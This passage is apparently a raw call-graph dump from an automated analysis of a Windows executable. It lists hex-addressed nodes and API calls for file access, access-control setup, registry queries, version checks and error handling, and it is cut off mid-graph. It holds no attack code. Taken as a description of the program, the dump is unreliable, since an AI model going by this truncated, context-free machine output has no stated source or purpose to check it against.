36076->36075 36077 a061f5 GetProcessHeap HeapFree 36076->36077 36078 a06206 GetProcessHeap HeapAlloc 36076->36078 36077->36078 36078->36075 36079 a06234 36078->36079 36079->36075 36085 a0533c 36079->36085 36084 a06287 GetFileSizeEx 36084->36075 36086 a05367 36085->36086 36102 a02880 36086->36102 36088 a05383 GetLastError 36089 a05370 36088->36089 36092 a02880 39 API calls 36089->36092 36090 a053d7 36090->36075 36093 a0540d 36090->36093 36092->36090 36094 a0542d 36093->36094 36153 a02310 SetFilePointer 36094->36153 36096 a05433 GetLastError 36097 a0543e 36096->36097 36098 a0546c 36096->36098 36099 a05464 SetLastError 36097->36099 36100 a05459 GetLastError 36097->36100 36098->36075 36098->36084 36099->36098 36100->36098 36100->36099 36103 a02893 36102->36103 36104 a028b4 CreateFileW 36102->36104 36109 a01f8c 36103->36109 36137 a02266 36104->36137 36141 a0fedc 36109->36141 36111 a01f98 InitializeSecurityDescriptor 36112 a021c7 36111->36112 36113 a01fd8 AllocateAndInitializeSid 36111->36113 36142 a02208 36112->36142 36113->36112 36114 a01ffd AllocateAndInitializeSid 36113->36114 36114->36112 36116 a0201e AllocateAndInitializeSid 36114->36116 36116->36112 36118 a0203f GetCurrentThread OpenThreadToken 36116->36118 36120 a02084 36118->36120 36121 a02058 GetLastError 36118->36121 36119 a021ee 36119->36104 36120->36112 36124 a0208f GetTokenInformation 36120->36124 36121->36112 36123 a02069 GetCurrentProcess OpenProcessToken 36121->36123 36122 a021dd GetProcessHeap HeapFree 36122->36119 36123->36112 36123->36120 36124->36112 36125 a020a6 GetLastError 36124->36125 36125->36112 36126 a020b5 GetProcessHeap HeapAlloc 36125->36126 36126->36112 36127 a020d4 GetTokenInformation 36126->36127 36127->36112 36128 a020ef 6 API calls 36127->36128 36128->36112 36129 a0213d InitializeAcl 36128->36129 36129->36112 36130 a0214d AddAccessAllowedAce 36129->36130 36130->36112 36131 a02162 AddAccessAllowedAce 36130->36131 36131->36112 36132 a02177 AddAccessAllowedAce 36131->36132 36132->36112 36133 a0218c EqualSid 36132->36133 36134 a0219b AddAccessAllowedAce 36133->36134 36135 a021af SetSecurityDescriptorDacl 36133->36135 36134->36112 36134->36135 36135->36112 36136 a021c0 36135->36136 36136->36112 36138 a02284 36137->36138 36139 a0226a GetProcessHeap HeapFree 36137->36139 36138->36088 36138->36089 36139->36138 36140 a0227e DebugBreak 36139->36140 36140->36138 36141->36111 36143 a0221a 36142->36143 36144 a0220e FreeSid 36142->36144 36145 a02220 FreeSid 36143->36145 36146 a0222c 36143->36146 36144->36143 36145->36146 36147 a02232 FreeSid 36146->36147 36148 a0223e 36146->36148 36147->36148 36149 a02245 CloseHandle 36148->36149 36150 a0224f 36148->36150 36149->36150 36151 a02253 GetProcessHeap HeapFree 36150->36151 36152 a021d3 36150->36152 36151->36152 36152->36119 36152->36122 36154 a02340 GetLastError 36153->36154 36155 a0234e 36153->36155 36154->36155 36155->36096 36155->36098 36292 9a35f0 36293 9a3613 36292->36293 36296 9a3605 36292->36296 36302 9a3a5e 36293->36302 36295 9a362b 36322 9a3b56 36295->36322 36298 9b9d9c 6 API calls 36296->36298 36300 9a366c 36298->36300 36299 9a3646 36299->36296 36340 9b8a19 36299->36340 36303 9a3a6a __EH_prolog3 36302->36303 36320 9a3a80 36303->36320 36350 9b490f 19 API calls __aulldiv 36303->36350 36305 9a3aab 36305->36320 36351 9b8c1d 36305->36351 36307 9b9d9c 6 API calls 36309 9a3b35 36307->36309 36310 9a3b40 36309->36310 36369 9b9b21 8 API calls 36309->36369 36317 9a3b4c 36310->36317 36370 9b9b21 8 API calls 36310->36370 36311 9a3aeb 36315 9a3b08 36311->36315 36316 9a3af0 36311->36316 36312 9a3ad0 36366 9a37ab 6 API calls 36312->36366 36315->36320 36368 9a3983 7 API calls __EH_prolog3 36315->36368 36367 9a388d 6 API calls 36316->36367 36317->36295 36320->36307 36323 9a3b62 __EH_prolog3 36322->36323 36324 9a3b77 36323->36324 36428 9b4406 12 API calls __aulldiv 36323->36428 36329 9b9d9c 6 API calls 36324->36329 36326 9a3ba0 36326->36324 36429 9a1bc9 36326->36429 36333 9a3c32 36329->36333 36330 9a3bcc 36434 9a37ab 6 API calls 36330->36434 36331 9a3be7 36336 9a3bec 36331->36336 36337 9a3c04 36331->36337 36332 9a3c3d 36332->36299 36333->36332 36437 9b9b21 8 API calls 36333->36437 36435 9a388d 6 API calls 36336->36435 36337->36324 36436 9a3983 7 API calls __EH_prolog3 36337->36436 36341 9b8a25 __EH_prolog3 36340->36341 36343 9b95ca 22 API calls 36341->36343 36347 9b8a32 36341->36347 36342 9b9d9c 6 API calls 36344 9b8aa2 36342->36344 36345 9b8a60 36343->36345 36346 9b8aad 36344->36346 36484 9b9b21 8 API calls 36344->36484 36345->36347 36467 9a34a0 36345->36467 36346->36296 36347->36342 36350->36305 36371 9aee5d 36351->36371 36354 9b8c85 36356 9b8c9b 36354->36356 36357 9b9a99 14 API calls 36354->36357 36359 9b8cac 36354->36359 36356->36359 36385 9b9c14 36356->36385 36357->36356 36360 9b9d9c 6 API calls 36359->36360 36361 9b8cc0 36360->36361 36363 9aee5d 2 API calls 36361->36363 36365 9a3ac3 36363->36365 36364 9b9a99 14 API calls 36364->36354 36365->36311 36365->36312 36365->36320 36366->36320 36367->36320 36368->36320 36369->36310 36370->36317 36372 9aee7b 36371->36372 36373 9aee67 GetProcessHeap HeapFree 36371->36373 36372->36354 36374 9b9a99 36372->36374 36373->36372 36395 9bcc6a 36374->36395 36379 9b9d9c 6 API calls 36381 9b8c4c 36379->36381 36380 9b9ad3 memcpy 36382 9b9aca 36380->36382 36381->36354 36381->36359 36381->36364 36383 9b9d9c 6 API calls 36382->36383 36384 9b9b00 36383->36384 36384->36379 36386 9b9c25 36385->36386 36392 9b9c34 36385->36392 36387 9bcc6a 6 API calls 36386->36387 36389 9b9c2e 36387->36389 36391 9b9c49 36389->36391 36389->36392 36390 9b9c43 36390->36391 36393 9b9d9c 6 API calls 36391->36393 36427 9bbb2e 11 API calls 36392->36427 36394 9b9c57 36393->36394 36394->36359 36396 9bcc82 36395->36396 36397 9bcc88 36396->36397 36398 9b9d9c 6 API calls 36396->36398 36401 9b9d9c 6 API calls 36397->36401 36399 9bcc98 36398->36399 36400 9b9d9c 6 API calls 36399->36400 36400->36397 36402 9b9ab1 36401->36402 36402->36384 36403 9bc7be 36402->36403 36404 9bc7f6 36403->36404 36410 9bc7d9 36403->36410 36405 9bccb5 6 API calls 36404->36405 36407 9bc801 36405->36407 36409 9bccb5 6 API calls 36407->36409 36421 9bc7ea 36407->36421 36409->36410 36410->36421 36423 9bccb5 36410->36423 36411 9bccb5 6 API calls 36417 9bc85f 36411->36417 36412 9b9d9c 6 API calls 36413 9bc907 36412->36413 36414 9b9ac4 36413->36414 36415 9bc90b GetProcessHeap HeapFree 36413->36415 36414->36380 36414->36382 36415->36414 36416 9b9d9c 6 API calls 36418 9bc89b 36416->36418 36417->36416 36417->36421 36419 9bc8a3 GetProcessHeap RtlAllocateHeap 36418->36419 36418->36421 36420 9bc8c8 memcpy 36419->36420 36419->36421 36422 9aee5d 2 API calls 36420->36422 36421->36412 36422->36421 36424 9bccc1 36423->36424 36425 9b9d9c 6 API calls 36424->36425 36426 9bc7e4 36425->36426 36426->36411 36426->36421 36427->36390 36428->36326 36438 9b95ca 36429->36438 36431 9b9d9c 6 API calls 36433 9a1bf3 36431->36433 36432 9a1bdf 36432->36431 36433->36324 36433->36330 36433->36331 36434->36324 36435->36324 36436->36324 36437->36332 36462 9a1892 36438->36462 36441 9b9768 36442 9b977d 36441->36442 36443 9b9c14 11 API calls 36441->36443 36445 9b9d9c 6 API calls 36442->36445 36443->36442 36444 9b9d9c 6 API calls 36452 9b962b 36444->36452 36446 9b9791 36445->36446 36447 9b979c 36446->36447 36466 9b9b21 8 API calls 36446->36466 36449 9b97b0 36447->36449 36450 9b97a0 GetProcessHeap HeapFree 36447->36450 36451 a0ea60 4 API calls 36449->36451 36450->36449 36453 9b97bf 36451->36453 36452->36442 36452->36444 36454 9b96cf GetProcessHeap HeapAlloc 36452->36454 36455 9b96bd GetProcessHeap HeapFree 36452->36455 36453->36432 36456 9b96ea GetProcessHeap HeapFree 36454->36456 36458 9b96fa 36454->36458 36455->36454 36456->36458 36457 9a1892 _vsnwprintf 36457->36458 36458->36452 36458->36457 36459 9b9727 36458->36459 36461 9b9738 36458->36461 36459->36442 36460 9b9c14 11 API calls 36459->36460 36460->36461 36461->36442 36463 9a18a1 36462->36463 36464 9a18b1 _vsnwprintf 36463->36464 36465 9a18d0 36463->36465 36464->36465 36465->36441 36465->36452 36466->36447 36468 9a34d0 36467->36468 36470 9a34bf 36467->36470 36469 9a3520 GetLastError 36468->36469 36468->36470 36485 9a1d02 36469->36485 36472 9b9d9c 6 API calls 36470->36472 36474 9a3587 36472->36474 36476 9a3592 36474->36476 36532 9b9b21 8 API calls 36474->36532 36476->36347 36480 9a356f 36481 9a359d GetCurrentThreadId 36480->36481 36483 9a3575 36480->36483 36522 9a3685 36481->36522 36483->36470 36484->36346 36533 a00caa 36485->36533 36488 a0086c GetLastError memset 36489 a00b2b 36488->36489 36492 a008ff 36488->36492 36491 a0ea60 4 API calls 36489->36491 36490 a00965 36496 a009aa 36490->36496 36583 9fedf9 VirtualQuery 36490->36583 36493 9a355d 36491->36493 36492->36489 36492->36490 36492->36492 36494 a00922 GetProcessHeap HeapAlloc 36492->36494 36493->36470 36531 9b7def 26 API calls 36493->36531 36494->36490 36495 a00946 36494->36495 36498 9be595 _vsnwprintf 36495->36498 36501 a00a44 TlsGetValue 36496->36501 36573 a0056f 36496->36573 36500 a00957 36498->36500 36499 a00978 36499->36496 36506 a00997 wcsrchr 36499->36506 36500->36490 36503 a00a54 36501->36503 36577 a003b6 GetLocalTime SystemTimeToVariantTime 36503->36577 36506->36496 36508 a00a23 36585 a04bae 25 API calls 36508->36585 36512 a00a34 GetProcessHeap HeapFree 36512->36501 36514 a00af3 36516 a00b05 36514->36516 36517 a00af8 36514->36517 36515 a00ae3 GetProcessHeap HeapFree 36515->36514 36519 a00b0c RaiseException 36516->36519 36520 a00b1d SetLastError 36516->36520 36586 a00307 63 API calls 36517->36586 36519->36520 36520->36489 36521 a00afd ExitProcess 36523 9a36a2 36522->36523 36524 9a3696 36522->36524 36525 9b95ca 22 API calls 36523->36525 36524->36483 36526 9a36ae 36525->36526 36527 9a36bb wprintf 36526->36527 36528 9a36b2 36526->36528 36527->36528 36529 9a36d9 36528->36529 36598 9b9b21 8 API calls 36528->36598 36529->36483 36531->36480 36532->36476 36534 9a1d16 36533->36534 36535 a00cce GetLastError 36533->36535 36534->36488 36552 a00b44 36535->36552 36538 a00dcf SetLastError 36538->36534 36539 a00dc6 36539->36538 36540 a00d06 FormatMessageW 36541 a00d2e 36540->36541 36542 a00d8f 36541->36542 36543 a00d48 GetProcessHeap HeapAlloc 36541->36543 36544 9a1892 _vsnwprintf 36542->36544 36545 a00d68 36543->36545 36546 a00d78 36543->36546 36548 a00da1 36544->36548 36568 9be595 36545->36568 36546->36542 36549 a00db5 36548->36549 36550 a00da5 GetProcessHeap HeapFree 36548->36550 36549->36538 36551 a00dbb LocalFree 36549->36551 36550->36549 36551->36538 36572 a0f2f8 36552->36572 36554 a00b50 TlsGetValue 36555 a00b70 EnterCriticalSection 36554->36555 36556 a00c9a 36554->36556 36557 a00b86 GetProcessHeap HeapAlloc 36555->36557 36558 a00bb7 36555->36558 36556->36538 36556->36539 36556->36540 36556->36541 36559 a00ba3 36557->36559 36564 a00c39 36557->36564 36560 a00bc6 GetProcessHeap HeapReAlloc 36558->36560 36561 a00bf7 GetProcessHeap RtlAllocateHeap 36558->36561 36559->36561 36562 a00be6 36560->36562 36560->36564 36563 a00c1b TlsSetValue 36561->36563 36561->36564 36562->36561 36563->36564 36565 a00c6f TlsSetValue GetProcessHeap HeapFree 36564->36565 36566 a00c4f 36564->36566 36567 a00c8d LeaveCriticalSection 36565->36567 36566->36567 36567->36556 36569 9be5a4 36568->36569 36570 9be5d4 36569->36570 36571 9be5b4 _vsnwprintf 36569->36571 36570->36546 36571->36570 36572->36554 36574 a00578 36573->36574 36576 a0057d 36573->36576 36587 a004a9 memset RegOpenKeyExW 36574->36587 36576->36501 36584 a00801 26 API calls 36576->36584 36578 a003f3 36577->36578 36579 a0ea60 4 API calls 36578->36579 36580 a00405 GetCurrentThreadId 36579->36580 36581 a00de1 TlsGetValue 36580->36581 36582 a00ab9 36581->36582 36582->36514 36582->36515 36583->36499 36584->36508 36585->36512 36586->36521 36588 a00505 RegQueryValueExW 36587->36588 36589 a0053b GetEnvironmentVariableW 36587->36589 36590 a0052a 36588->36590 36591 a0052b RegCloseKey 36588->36591 36592 a00561 36589->36592 36593 a00556 36589->36593 36590->36591 36591->36589 36591->36593 36594 a0ea60 4 API calls 36592->36594 36597 a00407 wcsrchr towlower towlower 36593->36597 36596 a0056d 36594->36596 36596->36576 36597->36592 36598->36529 37108 9a8be0 37109 9a8bf7 37108->37109 37111 9b8a19 183 API calls 37109->37111 37114 9a8c1d 37109->37114 37110 9a8c26 37112 9b8ab5 183 API calls 37110->37112 37111->37114 37113 9a8c4f 37112->37113 37115 9b9d9c 6 API calls 37113->37115 37114->37110 37117 9a8d3b 37114->37117 37116 9a914a 37115->37116 37118 9b8a19 183 API calls 37117->37118 37119 9a8d6a 37117->37119 37118->37119 37120 9b8a19 183 API calls 37119->37120 37121 9a8da3 37119->37121 37120->37121 37122 9b8a19 183 API calls 37121->37122 37123 9a8ddc 37121->37123 37122->37123 37124 9b8a19 183 API calls 37123->37124 37125 9a8e21 37123->37125 37124->37125 37126 9b8a19 183 API calls 37125->37126 37127 9a8e66 37125->37127 37126->37127 37128 9a8eab 37127->37128 37129 9b8a19 183 API calls 37127->37129 37130 9b8a19 183 API calls 37128->37130 37131 9a8ee4 37128->37131 37129->37128 37130->37131 37132 9a8f1d 37131->37132 37133 9b8a19 183 API calls 37131->37133 37134 9a8f54 37132->37134 37136 9b8a19 183 API calls 37132->37136 37133->37132 37135 9a8f8d 37134->37135 37142 9b8a19 183 API calls 37134->37142 37173 9ac756 37135->37173 37136->37134 37142->37135 37174 9ac765 __EH_prolog3_GS 37173->37174 37175 9ac78a memset 37174->37175 37288 9be9f7 memset GetModuleFileNameW 37175->37288 37180 9ac83f 37300 9bf51a 37180->37300 37181 9ac7fd GetLastError 37185 9ac80a 37181->37185 37184 9b8af9 2 API calls 37191 9ac850 37184->37191 37186 9b8ab5 183 API calls 37185->37186 37187 9ac83a 37186->37187 37189 9b9d9c 6 API calls 37187->37189 37192 9acb24 37189->37192 37191->37185 37199 9b8a19 183 API calls 37191->37199 37201 9ac8ad 37191->37201 37194 9acb33 37192->37194 37424 9b9b21 8 API calls 37192->37424 37193 9ac8d4 37400 9fd721 37193->37400 37198 9aee5d 2 API calls 37194->37198 37200 9acb49 37198->37200 37199->37201 37202 9aee5d 2 API calls 37200->37202 37327 9fde32 37201->37327 37203 9acb58 37202->37203 37421 a0f3a4 37203->37421 37206 9ac92f 37209 9b8a19 183 API calls 37206->37209 37213 9ac92a 37206->37213 37207 9ac8ea 37210 9b8a19 183 API calls 37207->37210 37207->37213 37208 9ac9cb 37211 9aca0b 37208->37211 37212 9ac9e3 GetSystemDefaultUILanguage 37208->37212 37209->37213 37210->37213 37216 9aca23 GetUserDefaultUILanguage 37211->37216 37219 9aca4b 37211->37219 37215 9aca01 37212->37215 37213->37208 37214 9b8a19 183 API calls 37213->37214 37214->37208 37217 9b8a19 183 API calls 37215->37217 37218 9aca41 37216->37218 37217->37211 37220 9b8a19 183 API calls 37218->37220 37221 9b8a19 183 API calls 37219->37221 37223 9aca88 37219->37223 37220->37219 37221->37223 37222 9acad0 37406 9bb583 37222->37406 37223->37222 37227 9b8a19 183 API calls 37223->37227 37226 9acaf4 37229 9b8ab5 183 API calls 37226->37229 37227->37222 37228 9acb60 37228->37187 37230 9b8a19 183 API calls 37228->37230 37229->37187 37230->37187 37289 9bea52 GetLastError 37288->37289 37290 9bea41 37288->37290 37292 9bea5e 37289->37292 37293 9bea61 SetLastError 37289->37293 37425 9bea79 7 API calls 37290->37425 37292->37293 37295 a0ea60 4 API calls 37293->37295 37294 9bea4c 37294->37289 37294->37293 37296 9ac7e7 37295->37296 37297 9b8af9 37296->37297 37298 9ac7f3 37297->37298 37299 9b8b06 GetProcessHeap HeapFree 37297->37299 37298->37180 37298->37181 37299->37298 37301 9bf540 37300->37301 37302 9bf665 SetLastError 37300->37302 37301->37302 37303 9bf54b 37301->37303 37304 9bf66f 37302->37304 37426 9be347 37303->37426 37306 a0ea60 4 API calls 37304->37306 37308 9ac844 37306->37308 37307 9bf550 37309 9bf558 37307->37309 37310 9bf652 GetLastError 37307->37310 37308->37184 37438 9bf496 GetFileVersionInfoSizeExW 37309->37438 37312 9bf65a SetLastError 37310->37312 37312->37304 37314 9bf573 VerQueryValueW 37317 9bf5a7 37314->37317 37321 9bf628 37314->37321 37315 9bf641 GetLastError 37315->37312 37316 9bf64d 37315->37316 37316->37312 37319 9be595 _vsnwprintf 37317->37319 37317->37321 37318 9bf62f GetProcessHeap HeapFree 37318->37312 37320 9bf5da 37319->37320 37320->37321 37322 9bf5e1 VerQueryValueW 37320->37322 37321->37312 37321->37318 37322->37321 37323 9bf60d 37322->37323 37323->37321 37324 9bf61f 37323->37324 37445 9bf6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 37324->37445 37326 9bf624 37326->37321 37446 a0f3e6 37327->37446 37329 9fde41 memset memset 37447 9fe4a7 memset RtlGetVersion 37329->37447 37332 9b9ca1 3 API calls 37333 9fdf10 37332->37333 37391 9fdf14 37333->37391 37465 9fdc8e GetModuleHandleW GetProcAddress 37333->37465 37338 9b9d9c 6 API calls 37341 9fe439 37338->37341 37339 9fdf4e RegOpenKeyExW 37342 9fdf7a 37339->37342 37340 9fe208 37530 9fddca 6 API calls 37340->37530 37344 9aee5d 2 API calls 37341->37344 37346 9fdf7e RegQueryValueExW 37342->37346 37342->37391 37345 9fe444 37344->37345 37349 9aee5d 2 API calls 37345->37349 37350 9fdfd3 RegQueryValueExW 37346->37350 37351 9fdfb3 37346->37351 37347 9fe23e RegOpenKeyExW 37348 9fe26e RegCloseKey 37347->37348 37359 9fe27a 37347->37359 37348->37359 37354 9fe44f 37349->37354 37352 9fe015 RegQueryValueExW 37350->37352 37368 9fe053 37350->37368 37351->37350 37352->37368 37353 9fe20d 37353->37347 37356 9aee5d 2 API calls 37354->37356 37355 9fe0b1 RegCloseKey 37362 9fe0c3 37355->37362 37357 9fe45a 37356->37357 37361 9aee5d 2 API calls 37357->37361 37358 9fe15b LoadLibraryW 37363 9fe16c GetProcAddress 37358->37363 37364 9fe1b0 GetLastError 37358->37364 37474 a0df14 37359->37474 37360 9fe0d0 37360->37358 37360->37391 37365 9fe465 37361->37365 37362->37358 37362->37360 37366 9fe0f7 SetLastError GetLastError 37362->37366 37363->37364 37370 9fe17e 37363->37370 37369 9a1d02 23 API calls 37364->37369 37371 9aee5d 2 API calls 37365->37371 37373 9a1d02 23 API calls 37366->37373 37368->37355 37368->37362 37375 9fe1e5 37369->37375 37370->37364 37394 9fe193 37370->37394 37372 9fe470 37371->37372 37376 9fe47f 37372->37376 37377 9fe478 FreeLibrary 37372->37377 37378 9fe133 37373->37378 37374 9fe322 37379 9fe37e GetLastError 37374->37379 37380 9fe32c CompareStringW 37374->37380 37381 a0086c 137 API calls 37375->37381 37382 9fe48f RegCloseKey 37376->37382 37383 9fe49b 37376->37383 37377->37376 37384 a0086c 137 API calls 37378->37384 37388 9a1d02 23 API calls 37379->37388 37385 9fe35b CompareStringW 37380->37385 37386 9fe356 37380->37386 37387 9fe1f4 GetLastError 37381->37387 37382->37383 37389 a0f3a4 4 API calls 37383->37389 37384->37360 37385->37386 37390 9fe3c3 GetLastError 37385->37390 37386->37390 37387->37391 37392 9fe3b4 37388->37392 37395 9ac8bb 37389->37395 37393 9a1d02 23 API calls 37390->37393 37391->37338 37396 a0086c 137 API calls 37392->37396 37397 9fe41d 37393->37397 37399 9fe1a4 GlobalFree 37394->37399 37395->37185 37395->37193 37396->37390 37398 a0086c 137 API calls 37397->37398 37398->37391 37399->37347 37401 9fd744 37400->37401 37403 9fd736 37400->37403 37725 9fd77d 37401->37725 37404 9b9d9c 6 API calls 37403->37404 37405 9ac8df 37404->37405 37405->37206 37405->37207 37749 9bc6d3 RegOpenKeyExW 37406->37749 37408 9bb5b4 RegQueryValueExW 37413 9bb5a2 37408->37413 37409 9bb601 37410 9b9d9c 6 API calls 37409->37410 37411 9bb647 37410->37411 37414 9bb65b 37411->37414 37415 9bb64b GetProcessHeap HeapFree 37411->37415 37412 9bb608 37412->37409 37755 9a1c76 13 API calls 37412->37755 37413->37408 37413->37409 37413->37412 37416 9bb5e3 GetProcessHeap HeapAlloc 37413->37416 37417 9acae1 37414->37417 37418 9bb661 RegCloseKey 37414->37418 37415->37414 37416->37408 37419 9bb5fa 37416->37419 37417->37226 37417->37228 37418->37417 37419->37409 37422 a0ea60 4 API calls 37421->37422 37423 a0f3ae 37422->37423 37423->37423 37424->37194 37425->37294 37427 9be3b2 SetLastError 37426->37427 37428 9be350 37426->37428 37427->37307 37428->37427 37429 9be357 37428->37429 37430 9be5fc 40 API calls 37429->37430 37431 9be360 37430->37431 37432 9be39d GetLastError 37431->37432 37433 9be366 GetFileAttributesW 37431->37433 37434 9be3a5 SetLastError 37432->37434 37435 9be383 GetLastError 37433->37435 37436 9be374 37433->37436 37434->37307 37437 9be38b GetProcessHeap HeapFree 37435->37437 37436->37437 37437->37434 37439 9bf4bd GetProcessHeap HeapAlloc 37438->37439 37443 9bf513 37438->37443 37440 9bf4f7 SetLastError 37439->37440 37441 9bf4d4 GetFileVersionInfoExW 37439->37441 37442 9bf4ea 37440->37442 37441->37442 37442->37443 37444 9bf503 GetProcessHeap HeapFree 37442->37444 37443->37314 37443->37315 37444->37443 37445->37326 37446->37329 37448 9b9ca1 3 API calls 37447->37448 37449 9fe4ff 37448->37449 37450 9fdcf8 6 API calls 37449->37450 37464 9fe503 37449->37464 37451 9fe520 37450->37451 37452 9fe52d GetLastError 37451->37452 37531 9fdaaa RegOpenKeyExW 37451->37531 37457 9a1d02 23 API calls 37452->37457 37453 9b9d9c 6 API calls 37456 9fe5f3 37453->37456 37458 a0ea60 4 API calls 37456->37458 37459 9fe59f 37457->37459 37460 9fdeb0 memset memset memset RtlGetVersion 37458->37460 37461 a0086c 137 API calls 37459->37461 37460->37332 37462 9fe5ae 37461->37462 37463 9fdcf8 6 API calls 37462->37463 37463->37464 37464->37453 37466 9fdcb8 GetNativeSystemInfo 37465->37466 37467 9fdcc4 GetSystemInfo 37465->37467 37469 9fdcca 37466->37469 37467->37469 37470 9fdcf8 memset RtlGetVersion 37469->37470 37471 9fdd3e 37470->37471 37472 a0ea60 4 API calls 37471->37472 37473 9fdd56 37472->37473 37473->37339 37473->37340 37475 a0df20 __EH_prolog3 37474->37475 37554 a0dd36 37475->37554 37477 a0df7c 37478 a0df94 37477->37478 37479 a0dfb8 37477->37479 37508 a0df82 37477->37508 37586 9bf6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 37478->37586 37480 a0dfd9 37479->37480 37481 a0dfa5 37479->37481 37484 a0dffa 37480->37484 37485 a0dfcf 37480->37485 37481->37479 37481->37508 37587 9bf6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 37481->37587 37489 a0dff0 37484->37489 37490 a0e01b 37484->37490 37485->37480 37485->37508 37588 9bf6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 37485->37588 37486 a0df9c 37491 9b8af9 2 API calls 37486->37491 37487 a0dfc6 37493 9b8af9 2 API calls 37487->37493 37489->37484 37489->37508 37589 9bf6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 37489->37589 37492 a0e011 37490->37492 37490->37508 37491->37481 37492->37490 37492->37508 37590 9bf6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 37492->37590 37493->37485 37494 9b9d9c 6 API calls 37498 a0e098 37494->37498 37495 a0dfe7 37499 9b8af9 2 API calls 37495->37499 37502 9aee5d 2 API calls 37498->37502 37499->37489 37500 a0e008 37503 9b8af9 2 API calls 37500->37503 37501 a0e02a 37504 9b8af9 2 API calls 37501->37504 37505 a0e0a0 37502->37505 37503->37492 37506 a0e033 37504->37506 37507 9aee5d 2 API calls 37505->37507 37506->37508 37509 a0e0a8 37507->37509 37508->37494 37510 9aee5d 2 API calls 37509->37510 37511 a0e0b0 37510->37511 37512 9aee5d 2 API calls 37511->37512 37513 a0e0b8 37512->37513 37514 9aee5d 2 API calls 37513->37514 37515 a0e0c0 37514->37515 37516 a0e0d2 37515->37516 37591 9b9b21 8 API calls 37515->37591 37518 a0e0e7 37516->37518 37592 9b9b21 8 API calls 37516->37592 37520 a0e0fc 37518->37520 37593 9b9b21 8 API calls 37518->37593 37522 a0e10f 37520->37522 37594 9b9b21 8 API calls 37520->37594 37524 a0e122 37522->37524 37595 9b9b21 8 API calls 37522->37595 37526 a0e137 37524->37526 37596 9b9b21 8 API calls 37524->37596 37527 a0e14c 37526->37527 37597 9b9b21 8 API calls 37526->37597 37527->37374 37530->37353 37532 9fdae9 GetLastError 37531->37532 37533 9fdb37 memset RegQueryValueExW RegCloseKey 37531->37533 37534 9a1d02 23 API calls 37532->37534 37535 9fdc2f 37533->37535 37536 9fdb99 37533->37536 37537 9fdb1a 37534->37537 37538 9fdc6c _wtoi 37535->37538 37539 9fdc38 GetLastError 37535->37539 37540 9fdb9e GetLastError 37536->37540 37541 9fdbe3 SetLastError GetLastError 37536->37541 37543 a0086c 137 API calls 37537->37543 37553 9fdb30 37538->37553 37544 9a1d02 23 API calls 37539->37544 37545 9a1d02 23 API calls 37540->37545 37542 9a1d02 23 API calls 37541->37542 37547 9fdc1b 37542->37547 37548 9fdb29 SetLastError 37543->37548 37544->37547 37546 9fdbce 37545->37546 37550 a0086c 137 API calls 37546->37550 37552 a0086c 137 API calls 37547->37552 37548->37553 37549 a0ea60 4 API calls 37551 9fdc8c 37549->37551 37550->37553 37551->37452 37552->37553 37553->37549 37555 a0dd42 __EH_prolog3 37554->37555 37583 a0dd6f 37555->37583 37598 a0d5fc 37555->37598 37556 9b9d9c 6 API calls 37557 a0de82 37556->37557 37558 a0de91 37557->37558 37671 9b9b21 8 API calls 37557->37671 37562 a0dea3 37558->37562 37672 9b9b21 8 API calls 37558->37672 37564 a0deb6 37562->37564 37673 9b9b21 8 API calls 37562->37673 37567 a0decb 37564->37567 37674 9b9b21 8 API calls 37564->37674 37568 a0dee0 37567->37568 37675 9b9b21 8 API calls 37567->37675 37572 a0def3 37568->37572 37676 9b9b21 8 API calls 37568->37676 37569 a0ddb7 37569->37583 37656 a0d245 37569->37656 37574 a0df06 37572->37574 37677 9b9b21 8 API calls 37572->37677 37574->37477 37579 a0ddd6 37579->37583 37669 a0dc16 23 API calls __EH_prolog3_GS 37579->37669 37581 a0ddf6 37582 a0de0b 37581->37582 37581->37583 37670 a0daf6 23 API calls __EH_prolog3_GS 37582->37670 37583->37556 37585 a0de13 37585->37583 37586->37486 37587->37487 37588->37495 37589->37500 37590->37501 37591->37516 37592->37518 37593->37520 37594->37522 37595->37524 37596->37526 37597->37527 37599 a0d60b __EH_prolog3_GS 37598->37599 37600 a0d645 memset RtlGetVersion 37599->37600 37628 a0d63b 37599->37628 37601 9b9ca1 3 API calls 37600->37601 37602 a0d67e 37601->37602 37604 a0d6f1 37602->37604 37602->37628 37678 9bb1d4 37602->37678 37603 9b9d9c 6 API calls 37605 a0d89d 37603->37605 37619 9b9c14 11 API calls 37604->37619 37604->37628 37607 a0d8b2 37605->37607 37715 9b9b21 8 API calls 37605->37715 37612 a0d8c4 37607->37612 37716 9b9b21 8 API calls 37607->37716 37610 a0d6c9 CompareStringW 37610->37604 37613 a0d77c CompareStringW 37610->37613 37616 a0d8d6 37612->37616 37717 9b9b21 8 API calls 37612->37717 37613->37604 37614 a0d7a7 CompareStringW 37613->37614 37614->37604 37618 a0d701 37614->37618 37617 a0d8ec 37616->37617 37718 9b9b21 8 API calls 37616->37718 37621 a0f3a4 4 API calls 37617->37621 37618->37628 37693 a0d460 37618->37693 37619->37618 37622 a0d8f7 37621->37622 37622->37583 37629 a0d8f8 37622->37629 37625 a0d720 CompareStringW 37626 a0d746 37625->37626 37625->37628 37627 9a1bc9 22 API calls 37626->37627 37627->37628 37628->37603 37630 a0d904 __EH_prolog3 37629->37630 37631 a0d460 32 API calls 37630->37631 37643 a0d91a 37630->37643 37632 a0d933 37631->37632 37633 a0d948 CompareStringW 37632->37633 37632->37643 37634 a0daa5 CompareStringW 37633->37634 37635 a0d96d 37633->37635 37636 a0dac4 CompareStringW 37634->37636 37639 a0da3b 37634->37639 37637 a0d5fc 47 API calls 37635->37637 37636->37639 37640 a0d975 37637->37640 37638 9b9d9c 6 API calls 37641 a0da65 37638->37641 37645 9b9c14 11 API calls 37639->37645 37642 a0d98a CompareStringW 37640->37642 37640->37643 37644 a0da74 37641->37644 37721 9b9b21 8 API calls 37641->37721 37642->37639 37647 a0d9af CompareStringW 37642->37647 37643->37638 37648 a0da87 37644->37648 37722 9b9b21 8 API calls 37644->37722 37645->37643 37647->37639 37650 a0d9ca CompareStringW 37647->37650 37649 a0da99 37648->37649 37723 9b9b21 8 API calls 37648->37723 37649->37569 37650->37639 37653 a0d9e5 CompareStringW 37650->37653 37653->37639 37654 a0da00 CompareStringW 37653->37654 37654->37639 37655 a0da1b CompareStringW 37654->37655 37655->37639 37657 a0d251 __EH_prolog3_GS 37656->37657 37658 a0d269 